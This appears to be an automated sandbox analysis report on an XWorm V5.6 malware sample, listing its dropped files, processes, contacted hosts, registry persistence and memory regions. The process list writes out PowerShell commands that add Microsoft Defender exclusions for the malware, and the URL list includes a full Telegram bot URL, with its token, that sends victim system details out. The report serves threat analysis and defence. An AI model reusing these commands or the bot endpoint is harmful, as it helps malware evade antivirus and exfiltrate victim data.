Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
file.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\svchost.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1eesaedm.0gz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22zaeb0w.g0a.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kbqhrel.ut2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agesxp1d.nah.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bc2kmm3v.0qb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etewax5f.sw1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqpsser0.l3d.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qobfazny.0fd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4f3cemm.yfx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnumhc4n.afc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sybuh4nv.x1w.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugwwonhs.xtg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl0s3x4r.rgx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoyoil5b.itp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yckccs03.alk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxe3vo2v.n1y.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 21 20:22:03
2024, mtime=Thu Nov 21 20:22:03 2024, atime=Thu Nov 21 20:22:03 2024, length=74240, window=hide
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\file.exe
|
"C:\Users\user\Desktop\file.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
|
||
C:\Users\user\AppData\Local\svchost.exe
|
"C:\Users\user\AppData\Local\svchost.exe"
|
||
C:\Users\user\AppData\Local\svchost.exe
|
"C:\Users\user\AppData\Local\svchost.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
87.120.112.33
|
|||
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://api.telegram.org
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://www.micom/pkiops/Docs/ry.htm0
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://crl.m
|
unknown
|
||
http://crl.microso
|
unknown
|
||
http://crl.mw
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB905B3EB694EB551DA9%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FO89G66H%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
|
149.154.167.220
|
||
http://crl.micft.cMicRosof
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://api.telegram.org
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://crl.micros
|
unknown
|
||
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=14704
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
87.120.112.33
|
unknown
|
Bulgaria
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
svchost
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2A23000
|
trusted library allocation
|
page read and write
|
||
2A0F000
|
trusted library allocation
|
page read and write
|
||
5C2000
|
unkown
|
page readonly
|
||
1D6D8F83000
|
trusted library allocation
|
page read and write
|
||
21FF0E30000
|
trusted library allocation
|
page read and write
|
||
44C000
|
heap
|
page read and write
|
||
7FFD9A2DB000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6D0000
|
trusted library allocation
|
page execute and read and write
|
||
42FFC79000
|
stack
|
page read and write
|
||
BF092CB000
|
stack
|
page read and write
|
||
7FFD9A2A0000
|
trusted library allocation
|
page read and write
|
||
1AE00000
|
heap
|
page execute and read and write
|
||
43E000
|
heap
|
page read and write
|
||
22734FC0000
|
heap
|
page read and write
|
||
7FFD9A44A000
|
trusted library allocation
|
page read and write
|
||
1B6BCD25000
|
heap
|
page read and write
|
||
7DF46D150000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A510000
|
trusted library allocation
|
page read and write
|
||
1D6D8F11000
|
trusted library allocation
|
page read and write
|
||
A61000
|
heap
|
page read and write
|
||
7FFD9A2EC000
|
trusted library allocation
|
page execute and read and write
|
||
21F80001000
|
trusted library allocation
|
page read and write
|
||
1D6C9359000
|
trusted library allocation
|
page read and write
|
||
8FF000
|
stack
|
page read and write
|
||
227350FF000
|
heap
|
page read and write
|
||
1B2E3000
|
heap
|
page read and write
|
||
7FFD9A366000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4A8000
|
trusted library allocation
|
page read and write
|
||
1B9A4000
|
heap
|
page read and write
|
||
21F80088000
|
trusted library allocation
|
page read and write
|
||
1D6C7490000
|
heap
|
page read and write
|
||
7FFD9A609000
|
trusted library allocation
|
page read and write
|
||
7FFD9A540000
|
trusted library allocation
|
page read and write
|
||
21F81E25000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6C0000
|
trusted library allocation
|
page read and write
|
||
1B6D6EF3000
|
heap
|
page read and write
|
||
7FFD9A29D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A37C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A570000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6E0000
|
trusted library allocation
|
page read and write
|
||
4280078000
|
stack
|
page read and write
|
||
1B6EE000
|
stack
|
page read and write
|
||
1D6C74E0000
|
heap
|
page read and write
|
||
1D6C74B0000
|
trusted library section
|
page read and write
|
||
1B6D7248000
|
heap
|
page read and write
|
||
227352D0000
|
trusted library allocation
|
page read and write
|
||
1B6BF7E7000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5C0000
|
trusted library allocation
|
page read and write
|
||
1B6BF782000
|
trusted library allocation
|
page read and write
|
||
2272CC4D000
|
trusted library allocation
|
page read and write
|
||
4280E0C000
|
stack
|
page read and write
|
||
1D6C8DB5000
|
heap
|
page read and write
|
||
7FFD9A34C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A530000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4D0000
|
trusted library allocation
|
page read and write
|
||
2AAA000
|
trusted library allocation
|
page read and write
|
||
AFD000
|
heap
|
page read and write
|
||
2271AF00000
|
heap
|
page read and write
|
||
1D6C8DB0000
|
heap
|
page read and write
|
||
5DBBC8E000
|
stack
|
page read and write
|
||
7FFD9A2EC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A2B0000
|
trusted library allocation
|
page read and write
|
||
21FF17E2000
|
heap
|
page read and write
|
||
1B6BE751000
|
trusted library allocation
|
page read and write
|
||
1B6CEA41000
|
trusted library allocation
|
page read and write
|
||
7FFD9A540000
|
trusted library allocation
|
page read and write
|
||
21FEF3A0000
|
heap
|
page read and write
|
||
5DBA95E000
|
stack
|
page read and write
|
||
5DBAEF9000
|
stack
|
page read and write
|
||
7FFD9A470000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A2B4000
|
trusted library allocation
|
page read and write
|
||
24A1000
|
trusted library allocation
|
page read and write
|
||
1D6CA0EA000
|
trusted library allocation
|
page read and write
|
||
21FEF3E4000
|
heap
|
page read and write
|
||
7FFD9A5E9000
|
trusted library allocation
|
page read and write
|
||
1B6D70C0000
|
heap
|
page read and write
|
||
7FFD9A619000
|
trusted library allocation
|
page read and write
|
||
2271C910000
|
heap
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
1B8F0000
|
heap
|
page read and write
|
||
1D6C7430000
|
heap
|
page read and write
|
||
7FFD9A2A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A356000
|
trusted library allocation
|
page read and write
|
||
1B6BE7D6000
|
trusted library allocation
|
page read and write
|
||
21FF1610000
|
heap
|
page read and write
|
||
7FFD9A2B3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A5E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A550000
|
trusted library allocation
|
page read and write
|
||
1D6CA034000
|
trusted library allocation
|
page read and write
|
||
7FFD9A490000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A35C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A346000
|
trusted library allocation
|
page read and write
|
||
21FF14D0000
|
heap
|
page execute and read and write
|
||
BF0817E000
|
stack
|
page read and write
|
||
2271AF12000
|
heap
|
page read and write
|
||
7FFD9A4B0000
|
trusted library allocation
|
page read and write
|
||
5DBAF3F000
|
stack
|
page read and write
|
||
191000
|
stack
|
page read and write
|
||
1D6C7281000
|
heap
|
page read and write
|
||
1DDA2000
|
heap
|
page read and write
|
||
7FFD9A3E0000
|
trusted library allocation
|
page execute and read and write
|
||
7DF46D140000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A6D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A472000
|
trusted library allocation
|
page read and write
|
||
4280D89000
|
stack
|
page read and write
|
||
7FFD9A471000
|
trusted library allocation
|
page read and write
|
||
A00000
|
trusted library allocation
|
page read and write
|
||
1C336000
|
heap
|
page read and write
|
||
7FFD9A2A4000
|
trusted library allocation
|
page read and write
|
||
2271AF47000
|
heap
|
page read and write
|
||
42FFBFE000
|
stack
|
page read and write
|
||
7FFD9A5F0000
|
trusted library allocation
|
page read and write
|
||
1D6E1661000
|
heap
|
page read and write
|
||
21F80C11000
|
trusted library allocation
|
page read and write
|
||
1B6D6FA0000
|
trusted library allocation
|
page read and write
|
||
42FFE77000
|
stack
|
page read and write
|
||
DE5000
|
heap
|
page read and write
|
||
7FFD9A650000
|
trusted library allocation
|
page read and write
|
||
1AE1C000
|
stack
|
page read and write
|
||
7FFD9A5C3000
|
trusted library allocation
|
page read and write
|
||
A03B80E000
|
stack
|
page read and write
|
||
5DBB0B8000
|
stack
|
page read and write
|
||
7FFD9A600000
|
trusted library allocation
|
page read and write
|
||
7FFD9A290000
|
trusted library allocation
|
page read and write
|
||
7DF472700000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A720000
|
trusted library allocation
|
page read and write
|
||
21FF1621000
|
heap
|
page read and write
|
||
1B6BFFE1000
|
trusted library allocation
|
page read and write
|
||
A03A77E000
|
stack
|
page read and write
|
||
1D6C9351000
|
trusted library allocation
|
page read and write
|
||
1B6D6DDB000
|
heap
|
page read and write
|
||
2271D51F000
|
trusted library allocation
|
page read and write
|
||
21FEF3C0000
|
heap
|
page read and write
|
||
1D6CA7A4000
|
trusted library allocation
|
page read and write
|
||
1B6BE6B6000
|
heap
|
page execute and read and write
|
||
7FFD9A5FC000
|
trusted library allocation
|
page read and write
|
||
42FFB7E000
|
stack
|
page read and write
|
||
1B6BF756000
|
trusted library allocation
|
page read and write
|
||
5DBB2BB000
|
stack
|
page read and write
|
||
BF0924D000
|
stack
|
page read and write
|
||
651000
|
heap
|
page read and write
|
||
7FFD9A4F0000
|
trusted library allocation
|
page read and write
|
||
1D6C74E5000
|
heap
|
page read and write
|
||
7FFD9A530000
|
trusted library allocation
|
page read and write
|
||
7FFD9A294000
|
trusted library allocation
|
page read and write
|
||
21FF14F0000
|
heap
|
page execute and read and write
|
||
2271B1D0000
|
heap
|
page read and write
|
||
21FF139F000
|
heap
|
page read and write
|
||
7FFD9A590000
|
trusted library allocation
|
page read and write
|
||
227351DF000
|
heap
|
page read and write
|
||
5DBAE7E000
|
stack
|
page read and write
|
||
5D0000
|
heap
|
page execute and read and write
|
||
1D6D9200000
|
trusted library allocation
|
page read and write
|
||
21FEF44B000
|
heap
|
page read and write
|
||
2271DC31000
|
trusted library allocation
|
page read and write
|
||
7FFD9A69C000
|
trusted library allocation
|
page read and write
|
||
1D6E16E7000
|
heap
|
page read and write
|
||
7FFD9A560000
|
trusted library allocation
|
page read and write
|
||
1B6BE5E0000
|
trusted library allocation
|
page read and write
|
||
1D6C9139000
|
trusted library allocation
|
page read and write
|
||
2272C921000
|
trusted library allocation
|
page read and write
|
||
227351BB000
|
heap
|
page read and write
|
||
A03A6FE000
|
stack
|
page read and write
|
||
7FFD9A430000
|
trusted library allocation
|
page read and write
|
||
1DDA8000
|
heap
|
page read and write
|
||
1B6CE781000
|
trusted library allocation
|
page read and write
|
||
FEE000
|
stack
|
page read and write
|
||
2A1F000
|
trusted library allocation
|
page read and write
|
||
638000
|
heap
|
page read and write
|
||
7FFD9A608000
|
trusted library allocation
|
page read and write
|
||
21FF0F01000
|
heap
|
page read and write
|
||
21FEF340000
|
heap
|
page read and write
|
||
1D6C7240000
|
heap
|
page read and write
|
||
7FFD9A460000
|
trusted library allocation
|
page execute and read and write
|
||
5DBBE07000
|
stack
|
page read and write
|
||
1D04D000
|
stack
|
page read and write
|
||
7FFD9A2A2000
|
trusted library allocation
|
page read and write
|
||
22734EFF000
|
heap
|
page read and write
|
||
7FFD9A350000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A2FC000
|
trusted library allocation
|
page execute and read and write
|
||
1D6D91FC000
|
trusted library allocation
|
page read and write
|
||
1D6C9962000
|
trusted library allocation
|
page read and write
|
||
2271AF45000
|
heap
|
page read and write
|
||
1AE02000
|
heap
|
page read and write
|
||
1B6BF92C000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4C0000
|
trusted library allocation
|
page read and write
|
||
D03000
|
trusted library allocation
|
page read and write
|
||
7FFD9A350000
|
trusted library allocation
|
page read and write
|
||
BF082FF000
|
stack
|
page read and write
|
||
7FFD9A5B0000
|
trusted library allocation
|
page read and write
|
||
21F810C2000
|
trusted library allocation
|
page read and write
|
||
7FFD9A440000
|
trusted library allocation
|
page read and write
|
||
2271E274000
|
trusted library allocation
|
page read and write
|
||
1D6E1386000
|
heap
|
page execute and read and write
|
||
21FF152D000
|
heap
|
page read and write
|
||
7FFD9A4B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A376000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A570000
|
trusted library allocation
|
page read and write
|
||
7FFD9A488000
|
trusted library allocation
|
page read and write
|
||
5DBAFB7000
|
stack
|
page read and write
|
||
7FFD9A2E0000
|
trusted library allocation
|
page read and write
|
||
24B1000
|
trusted library allocation
|
page read and write
|
||
21F902F9000
|
trusted library allocation
|
page read and write
|
||
21FEF740000
|
trusted library allocation
|
page read and write
|
||
21FF1648000
|
heap
|
page read and write
|
||
6BF000
|
heap
|
page read and write
|
||
4C6000
|
heap
|
page read and write
|
||
7FFD9A2D0000
|
trusted library allocation
|
page read and write
|
||
1D6C920E000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5F8000
|
trusted library allocation
|
page read and write
|
||
7FFD9A290000
|
trusted library allocation
|
page read and write
|
||
7FFD9A520000
|
trusted library allocation
|
page read and write
|
||
BF081FE000
|
stack
|
page read and write
|
||
1D6E1672000
|
heap
|
page read and write
|
||
1B25D000
|
stack
|
page read and write
|
||
1B6BF4C4000
|
trusted library allocation
|
page read and write
|
||
7FFD9A610000
|
trusted library allocation
|
page read and write
|
||
2272CC28000
|
trusted library allocation
|
page read and write
|
||
BF07DCF000
|
stack
|
page read and write
|
||
7FFD9A740000
|
trusted library allocation
|
page read and write
|
||
21F90021000
|
trusted library allocation
|
page read and write
|
||
1B2E0000
|
heap
|
page read and write
|
||
6B9000
|
heap
|
page read and write
|
||
7FFD9A2AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A4A0000
|
trusted library allocation
|
page read and write
|
||
1D6E1479000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
21FF1532000
|
heap
|
page read and write
|
||
7FFD9A4A0000
|
trusted library allocation
|
page execute and read and write
|
||
1C322000
|
heap
|
page read and write
|
||
2271AF41000
|
heap
|
page read and write
|
||
2271C875000
|
heap
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
1C31F000
|
heap
|
page read and write
|
||
21F81034000
|
trusted library allocation
|
page read and write
|
||
BF09347000
|
stack
|
page read and write
|
||
1D6E139E000
|
heap
|
page read and write
|
||
2A07000
|
trusted library allocation
|
page read and write
|
||
1D6E15F8000
|
heap
|
page read and write
|
||
1D6C8F00000
|
heap
|
page read and write
|
||
7FFD9A5F3000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6F6000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6B0000
|
trusted library allocation
|
page execute and read and write
|
||
1B6BFED5000
|
trusted library allocation
|
page read and write
|
||
69F000
|
heap
|
page read and write
|
||
493000
|
heap
|
page read and write
|
||
7FFD9A2B0000
|
trusted library allocation
|
page read and write
|
||
1B6BF358000
|
trusted library allocation
|
page read and write
|
||
2AA8000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A484000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6E0000
|
trusted library allocation
|
page read and write
|
||
21FF1520000
|
heap
|
page read and write
|
||
1B6BE610000
|
heap
|
page execute and read and write
|
||
7FFD9A474000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2AB000
|
trusted library allocation
|
page read and write
|
||
7FFD9A700000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5E0000
|
trusted library allocation
|
page read and write
|
||
1C4B0000
|
heap
|
page execute and read and write
|
||
7FFD9A6F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A710000
|
trusted library allocation
|
page read and write
|
||
2271AF86000
|
heap
|
page read and write
|
||
1B7EE000
|
stack
|
page read and write
|
||
7FFD9A620000
|
trusted library allocation
|
page read and write
|
||
1D6E13EC000
|
heap
|
page read and write
|
||
1D6CACF2000
|
trusted library allocation
|
page read and write
|
||
7FFD9A630000
|
trusted library allocation
|
page read and write
|
||
D70000
|
heap
|
page execute and read and write
|
||
42FFCFE000
|
stack
|
page read and write
|
||
42D000
|
heap
|
page read and write
|
||
570000
|
trusted library allocation
|
page read and write
|
||
1D6C8DC1000
|
heap
|
page read and write
|
||
9B0000
|
heap
|
page read and write
|
||
1B961000
|
heap
|
page read and write
|
||
7FFD9A710000
|
trusted library allocation
|
page read and write
|
||
1C1FE000
|
stack
|
page read and write
|
||
22735420000
|
heap
|
page read and write
|
||
1D6E1380000
|
heap
|
page execute and read and write
|
||
7FFD9A2C0000
|
trusted library allocation
|
page read and write
|
||
21FF0D90000
|
heap
|
page readonly
|
||
7FFD9A5B0000
|
trusted library allocation
|
page read and write
|
||
BF080FE000
|
stack
|
page read and write
|
||
7FFD9A680000
|
trusted library allocation
|
page read and write
|
||
A03A87E000
|
stack
|
page read and write
|
||
21F80F69000
|
trusted library allocation
|
page read and write
|
||
21FEF41F000
|
heap
|
page read and write
|
||
21FF1703000
|
heap
|
page read and write
|
||
1B6BF8B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A550000
|
trusted library allocation
|
page read and write
|
||
1D6C7289000
|
heap
|
page read and write
|
||
BF087FB000
|
stack
|
page read and write
|
||
2A93000
|
trusted library allocation
|
page read and write
|
||
7FFD9A710000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2CB000
|
trusted library allocation
|
page read and write
|
||
21F81E05000
|
trusted library allocation
|
page read and write
|
||
4280D0E000
|
stack
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
1AC02000
|
heap
|
page read and write
|
||
21F813CB000
|
trusted library allocation
|
page read and write
|
||
1D6C9CF7000
|
trusted library allocation
|
page read and write
|
||
129A1000
|
trusted library allocation
|
page read and write
|
||
7FFD9A292000
|
trusted library allocation
|
page read and write
|
||
1B6D6DCF000
|
heap
|
page read and write
|
||
7FFD9A6B3000
|
trusted library allocation
|
page read and write
|
||
5C0000
|
unkown
|
page readonly
|
||
1D6C924C000
|
trusted library allocation
|
page read and write
|
||
A8D000
|
heap
|
page read and write
|
||
2A58000
|
trusted library allocation
|
page read and write
|
||
1B6CEA5B000
|
trusted library allocation
|
page read and write
|
||
1D6E14B0000
|
heap
|
page read and write
|
||
1BFAB000
|
stack
|
page read and write
|
||
5DBB23F000
|
stack
|
page read and write
|
||
40000
|
unkown
|
page readonly
|
||
24AF000
|
trusted library allocation
|
page read and write
|
||
42FFFFE000
|
stack
|
page read and write
|
||
7FFD9A2C3000
|
trusted library allocation
|
page execute and read and write
|
||
1B6BFA59000
|
trusted library allocation
|
page read and write
|
||
7FFD9A530000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2A0000
|
trusted library allocation
|
page read and write
|
||
1D6E171A000
|
heap
|
page read and write
|
||
7FFD9A510000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4C0000
|
trusted library allocation
|
page read and write
|
||
1AF0E000
|
stack
|
page read and write
|
||
7FFD9A432000
|
trusted library allocation
|
page read and write
|
||
7FFD9A580000
|
trusted library allocation
|
page read and write
|
||
7FFD9A590000
|
trusted library allocation
|
page read and write
|
||
7FFD9A452000
|
trusted library allocation
|
page read and write
|
||
227351A8000
|
heap
|
page read and write
|
||
7FFD9A6D0000
|
trusted library allocation
|
page read and write
|
||
21F8103A000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6FD000
|
trusted library allocation
|
page read and write
|
||
7FFD9A640000
|
trusted library allocation
|
page read and write
|
||
2271AF49000
|
heap
|
page read and write
|
||
7FFD9A612000
|
trusted library allocation
|
page read and write
|
||
2271DBA9000
|
trusted library allocation
|
page read and write
|
||
1C0FF000
|
stack
|
page read and write
|
||
7FFD9A3B0000
|
trusted library allocation
|
page execute and read and write
|
||
1B6BE745000
|
heap
|
page read and write
|
||
7FFD9A2B4000
|
trusted library allocation
|
page read and write
|
||
1D110000
|
heap
|
page read and write
|
||
1B6BCD1B000
|
heap
|
page read and write
|
||
7FFD9A610000
|
trusted library allocation
|
page read and write
|
||
2271E1B3000
|
trusted library allocation
|
page read and write
|
||
7FFD9A441000
|
trusted library allocation
|
page read and write
|
||
2271C8E0000
|
heap
|
page execute and read and write
|
||
1B8EC000
|
stack
|
page read and write
|
||
21FF1710000
|
heap
|
page read and write
|
||
4280E8E000
|
stack
|
page read and write
|
||
21FF1656000
|
heap
|
page read and write
|
||
7FFD9A2A0000
|
trusted library allocation
|
page read and write
|
||
1B6BCD1F000
|
heap
|
page read and write
|
||
21FF17D6000
|
heap
|
page read and write
|
||
1D6D8F41000
|
trusted library allocation
|
page read and write
|
||
21FEF360000
|
heap
|
page read and write
|
||
2271AED0000
|
heap
|
page read and write
|
||
7FFD9A396000
|
trusted library allocation
|
page execute and read and write
|
||
21F80A52000
|
trusted library allocation
|
page read and write
|
||
227350B0000
|
heap
|
page read and write
|
||
2271C830000
|
heap
|
page readonly
|
||
448000
|
heap
|
page read and write
|
||
7FFD9A450000
|
trusted library allocation
|
page read and write
|
||
A03ADBE000
|
stack
|
page read and write
|
||
1B6D6DDE000
|
heap
|
page read and write
|
||
2271D372000
|
trusted library allocation
|
page read and write
|
||
42FFF39000
|
stack
|
page read and write
|
||
7FFD9A6A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2AD000
|
trusted library allocation
|
page execute and read and write
|
||
42FFFBA000
|
stack
|
page read and write
|
||
A63000
|
heap
|
page read and write
|
||
7FFD9A690000
|
trusted library allocation
|
